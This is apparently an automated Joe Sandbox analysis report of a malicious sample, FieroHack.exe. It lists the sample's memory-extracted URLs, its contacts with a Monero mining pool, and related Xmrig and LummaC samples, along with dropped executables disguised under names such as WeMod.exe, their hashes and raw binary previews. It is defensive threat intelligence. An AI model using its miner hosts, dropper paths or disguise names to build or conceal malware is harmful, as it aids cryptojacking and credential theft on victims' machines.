      http://www.fontbureau.com/designers0%URL Reputationsafe
      http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
      http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
      http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.fontbureau.com/designers80%URL Reputationsafe
      http://www.fonts.com0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://crl.ver)0%Avira URL Cloudsafe
      https://g.live.com/odclientsettings/Prod.C:0%VirustotalBrowse
      https://g.live.com/odclientsettings/ProdV20%Avira URL Cloudsafe
      https://g.live.com/odclientsettings/Prod.C:0%Avira URL Cloudsafe
      https://api.ip.s0%Avira URL Cloudsafe
      https://g.live.com/odclientsettings/ProdV2.C:0%Avira URL Cloudsafe
      https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c960%Avira URL Cloudsafe
      https://discord.com/api/v9/users/0%Avira URL Cloudsafe
      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b60%Avira URL Cloudsafe
      https://g.live.com/odclientsettings/ProdV2.C:0%VirustotalBrowse
      https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c960%VirustotalBrowse
      https://discord.com/api/v9/users/0%VirustotalBrowse
      https://g.live.com/odclientsettings/ProdV20%VirustotalBrowse

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      pool-fr.supportxmr.com
      		141.94.96.195
      		truefalseunknown
      pool.supportxmr.com
      		unknown
      		unknownfalseunknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://www.apache.org/licenses/LICENSE-2.0Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.fontbureau.comSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      http://www.fontbureau.com/designersGSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://api.ip.sb/ipSirus.exe, 00000007.00000002.1976423267.0000000002864000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://sectigo.com/CPS0WeMod.exe.0.dr, leirdnhqqedj.exe.2.drfalse
      • URL Reputation: safe
      		unknown
      http://www.fontbureau.com/designers/?Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.founder.com.cn/cn/bTheSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      http://ocsp.sectigo.com0WeMod.exe.0.dr, leirdnhqqedj.exe.2.drfalse
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      http://www.fontbureau.com/designers?Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://crl.ver)svchost.exe, 00000023.00000002.2205326641.0000020AFD28E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.tiro.comSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://g.live.com/odclientsettings/ProdV2.C:edb.log.35.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://api.ip.sSirus.exe, 00000007.00000002.1976423267.0000000002864000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.fontbureau.com/designersSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://nsis.sf.net/NSIS_ErrorErrorFieroHack.exefalse
      • URL Reputation: safe
      		unknown
      http://www.goodfont.co.krSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.carterandcone.comlSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.sajatypeworks.comSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.typography.netDSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://g.live.com/odclientsettings/Prod.C:edb.log.35.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tWeMod.exe.0.dr, leirdnhqqedj.exe.2.drfalse
      • URL Reputation: safe
      		unknown
      http://www.fontbureau.com/designers/cabarga.htmlNSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.founder.com.cn/cn/cTheSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.galapagosdesign.com/staff/dennis.htmSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.founder.com.cn/cnSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.fontbureau.com/designers/frere-user.htmlSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://g.live.com/odclientsettings/ProdV2edb.log.35.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://nsis.sf.net/NSIS_ErrorFieroHack.exefalse
      • URL Reputation: safe
      		unknown
      https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000023.00000003.1960939694.0000020AFD082000.00000004.00000800.00020000.00000000.sdmp, edb.log.35.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#WeMod.exe.0.dr, leirdnhqqedj.exe.2.drfalse
      • URL Reputation: safe
      		unknown
      http://www.jiyu-kobo.co.jp/Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://discord.com/api/v9/users/Sirus.exe, 00000007.00000002.1976423267.00000000028F4000.00000004.00000800.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://www.galapagosdesign.com/DPleaseSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.fontbureau.com/designers8Sirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.fonts.comSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.sandoll.co.krSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.urwpp.deDPleaseSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.zhongyicts.com.cnSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.sakkal.comSirus.exe, 00000007.00000002.1979761923.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000023.00000003.1960939694.0000020AFD082000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.35.dr, edb.log.35.drfalse
      • Avira URL Cloud: safe
      		unknown

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      141.94.96.144
      		unknownGermany
      		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue

      Private

      IP
      127.0.0.1

      General Information

      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1464754
      Start date and time:2024-06-30 01:33:07 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 12m 15s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:71
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:FieroHack.exe
      Detection:MAL
      Classification:mal100.spyw.evad.mine.winEXE@98/19@1/2
      EGA Information:
      • Successful, ratio: 60%
      HCA Information:
      • Successful, ratio: 96%
      • Number of executed functions: 138
      • Number of non-executed functions: 47
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Override analysis time to 240000 for current running targets taking high CPU consumption

      Warnings

      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
      • Excluded IPs from analysis (whitelisted): 184.28.90.27
      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
      • Execution Graph export aborted for target WeMod.exe, PID 4340 because there are no executed function
      • Execution Graph export aborted for target leirdnhqqedj.exe, PID 6796 because there are no executed function
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtCreateKey calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      19:34:16API Interceptor1x Sleep call for process: WeMod.exe modified
      19:34:19API Interceptor43x Sleep call for process: powershell.exe modified
      19:34:27API Interceptor3x Sleep call for process: svchost.exe modified

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      141.94.96.144h2UFp4aCRq.exeGet hashmaliciousLoaderBot, XmrigBrowse
        curriculum_vitae-copie.vbsGet hashmaliciousXmrigBrowse
          curriculum_vitae-copie_(1).vbsGet hashmaliciousXmrigBrowse
            curriculum_vitae-copie.vbsGet hashmaliciousXmrigBrowse
              Vsob3IooE7.exeGet hashmaliciousXmrigBrowse
                GameBar.exeGet hashmaliciousXmrigBrowse
                  FTrondtloadws.exeGet hashmaliciousXmrigBrowse
                    file.exeGet hashmaliciousXmrigBrowse
                      GoogleUpdate.exeGet hashmaliciousXmrigBrowse
                        d.pyGet hashmaliciousPwnRig MinerBrowse

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          pool-fr.supportxmr.comFieroHack.exeGet hashmaliciousLummaC, XmrigBrowse
                          • 141.94.96.195
                          gVRqUej0ci.exeGet hashmaliciousXmrigBrowse
                          • 141.94.96.71
                          h2UFp4aCRq.exeGet hashmaliciousLoaderBot, XmrigBrowse
                          • 141.94.96.144
                          setup.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                          • 141.94.96.71
                          SecuriteInfo.com.Win32.Evo-gen.18867.15916.exeGet hashmaliciousXmrigBrowse
                          • 141.94.96.71
                          http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                          • 141.94.96.71
                          http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                          • 141.94.96.195
                          file.exeGet hashmaliciousLoaderBot, XmrigBrowse
                          • 141.94.96.195
                          setup.EXE.exeGet hashmaliciousXmrigBrowse
                          • 141.94.96.195
                          updater.exeGet hashmaliciousXmrigBrowse
                          • 141.94.96.71

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          DFNVereinzurFoerderungeinesDeutschenForschungsnetzesewxa7qH57Zr.elfGet hashmaliciousMiraiBrowse
                          • 134.106.29.246
                          AlKRN3v4DY.elfGet hashmaliciousMiraiBrowse
                          • 194.95.210.148
                          f9DYXBf380.elfGet hashmaliciousMirai, MoobotBrowse
                          • 141.94.189.51
                          tdQ8dOfnDZ.elfGet hashmaliciousMirai, MoobotBrowse
                          • 134.104.88.95
                          iOf1YICai3.elfGet hashmaliciousMiraiBrowse
                          • 141.65.229.95
                          https://i.imgur.com/fIszkFh.pngGet hashmaliciousUnknownBrowse
                          • 141.94.171.215
                          https://riprogramma.consegna.3-79-47-0.cprapid.com/brt/update.php?%276Get hashmaliciousUnknownBrowse
                          • 141.95.171.139
                          http://3-79-47-0.cprapid.com/brt/update.php?%2704bd392f228f637be355Get hashmaliciousUnknownBrowse
                          • 141.94.242.226
                          http://playsportzone.comGet hashmaliciousUnknownBrowse
                          • 141.94.171.215
                          FieroHack.exeGet hashmaliciousLummaC, XmrigBrowse
                          • 141.94.96.195

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Windows\Temp\qkrjwvgkutvb.sysCrackLauncher.exeGet hashmaliciousBlank Grabber, PureLog Stealer, Umbral Stealer, XWorm, Xmrig, zgRATBrowse
                            tmpjtj6c3r6.exeGet hashmaliciousUnknownBrowse
                              qHYHgANDmm.exeGet hashmaliciousRedLine, XmrigBrowse
                                FieroHack.exeGet hashmaliciousLummaC, XmrigBrowse
                                  gVRqUej0ci.exeGet hashmaliciousXmrigBrowse
                                    08OyZEWGbf.exeGet hashmaliciousXmrigBrowse
                                      SecuriteInfo.com.Trojan.InjectNET.14.31451.20106.exeGet hashmaliciousHavoc, SilentXMRMiner, XmrigBrowse
                                        SecuriteInfo.com.Win32.Evo-gen.18867.15916.exeGet hashmaliciousXmrigBrowse
                                          SecuriteInfo.com.Win32.Evo-gen.10989.17096.exeGet hashmaliciousXmrigBrowse
                                            Galaxy Swapper v2.0.3.exeGet hashmaliciousLummaC, XmrigBrowse
                                              C:\Users\user\AppData\Roaming\WeMod.exeFieroHack.exeGet hashmaliciousLummaC, XmrigBrowse
                                                C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeFieroHack.exeGet hashmaliciousLummaC, XmrigBrowse

                                                  Created / dropped Files

                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                  Download File
                                                  Process:C:\Windows\System32\svchost.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8192
                                                  Entropy (8bit):0.363788168458258
                                                  Encrypted:false
                                                  SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                  MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                  SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                  SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                  SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                  Malicious:false
                                                  Preview:*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................

                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                  Download File
                                                  Process:C:\Windows\System32\svchost.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1310720
                                                  Entropy (8bit):1.3108347942096756
                                                  Encrypted:false
                                                  SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrQ:KooCEYhgYEL0In
                                                  MD5:6B866BE0FA86966E5A0A01B3FB5B9F0B
                                                  SHA1:37174C314D9D1D86926274EAEBFEDA6F8FC73222
                                                  SHA-256:DB0EB45AF2B98C840CBF91E486843B255D4E931193BF0FE557A657208AFC1078
                                                  SHA-512:DC7A307E77EC1C3859F497F0067BFCCD5201C56046F4D8B9021978A4114BA7CAB654A55ED82C8908B948D57020299365E5DFA854DBDDCD62B163AE851A2A576B
                                                  Malicious:false
                                                  Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                  Download File
                                                  Process:C:\Windows\System32\svchost.exe
                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9d39cb34, page size 16384, Windows version 10.0
                                                  Category:dropped
                                                  Size (bytes):1310720
                                                  Entropy (8bit):0.4222423169995828
                                                  Encrypted:false
                                                  SSDEEP:1536:HSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:Hazag03A2UrzJDO
                                                  MD5:5AABF243808C77D9FF4A0E69117E979F
                                                  SHA1:EB07B491D5A1D9D25A7EE37CC61AE6E094E44AE8
                                                  SHA-256:6384FA72CDC7716BA31FCFC159B78DA56953CC240C2AF4A79ECF6A95B6576683
                                                  SHA-512:496BF26A80590530A268506B937C95EB1355FEFD350B107475A9AA5D57C25784736B9B744F73F1AF68E24B56A9EC3AEA2E892B0D6333883020BD793F8DDF30C6
                                                  Malicious:false
                                                  Preview:.9.4... .......Y.......X\...;...{......................n.%......#...|Y.."...|..h.#......#...|Y.n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{....................................9Y.#...|Y..................t.a.#...|Y..........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................

                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                  Download File
                                                  Process:C:\Windows\System32\svchost.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16384
                                                  Entropy (8bit):0.07916387731498194
                                                  Encrypted:false
                                                  SSDEEP:3:sOSlsetYeJLl8t15uqdHusX4e1nYl4e1allOE/tlnl+/rTc:sxlzJ6usX45lOpMP
                                                  MD5:8F94D448E061F9129F23343830695CA3
                                                  SHA1:3D8EBBBBA2A67C7A1BD16158D395F2318D4851E0
                                                  SHA-256:536AE9F57FE4142BDA19E2725DA75C13584434F28F5E48D887EBCCDC49463BAB
                                                  SHA-512:9DD15C86AFF0DD6A24505ACAD25576E2045DE117AB90FE6B6EDE69D589C1C13F453C218BC0CE2B5EC6F2B394F0CCA870827378D98F1EBC337CEBA90112C6BB90
                                                  Malicious:false
                                                  Preview:.z.k.....................................;...{..."...|...#...|Y..........#...|Y..#...|Y....#...|Y..................t.a.#...|Y.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\WeMod.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):718354208
                                                  Entropy (8bit):0.0682733719875978
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6A2D1FD5BA3F75656E23FEEF98269C17
                                                  SHA1:FF53B16BA78B6EAC4C3EDD11E0BAD08DDDDF9AED
                                                  SHA-256:D31478DA75850F66BA9FFB48AAD05BA6EC4E93B2534EA8BA230376F5D553579C
                                                  SHA-512:08D3565A332FD56F125634697A03D11B83D16E2E54B23A14C6110373C4A559BADDDCDF304158834DF42F98E1714849C3E8990B725ED3D1A6A86CD687984C686D
                                                  Malicious:true
                                                  Joe Sandbox View:
                                                  • Filename: FieroHack.exe, Detection: malicious, Browse
                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...QGpf.........."......|+.H.S.......)........@..............................T........*..`...................................................)...............(........* 1....)...............................).(....................................................rsrc............................... ..`.data...|-..........................@..@.pdata.. .'.........................@....pdata........(.....................@..@.pexe.........(.....................@..@.rsrc.........).....................@....rsrc.....*...)...*.................`...................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sirus.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\Sirus.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1119
                                                  Entropy (8bit):5.345080863654519
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                  MD5:88593431AEF401417595E7A00FE86E5F
                                                  SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                  SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                  SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):1.1940658735648508
                                                  Encrypted:false
                                                  SSDEEP:3:NlllulVmdtZ:NllUM
                                                  MD5:013016A37665E1E37F0A3576A8EC8324
                                                  SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                                  SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                                  SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                                  Malicious:false
                                                  Preview:@...e................................................@..........

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_catdkevj.qs2.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4oedzwr.abp.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nexp3e4g.5wk.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prm5lgoy.tz1.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Roaming\WeMod.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\FieroHack.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):718354208
                                                  Entropy (8bit):0.0682733719875978
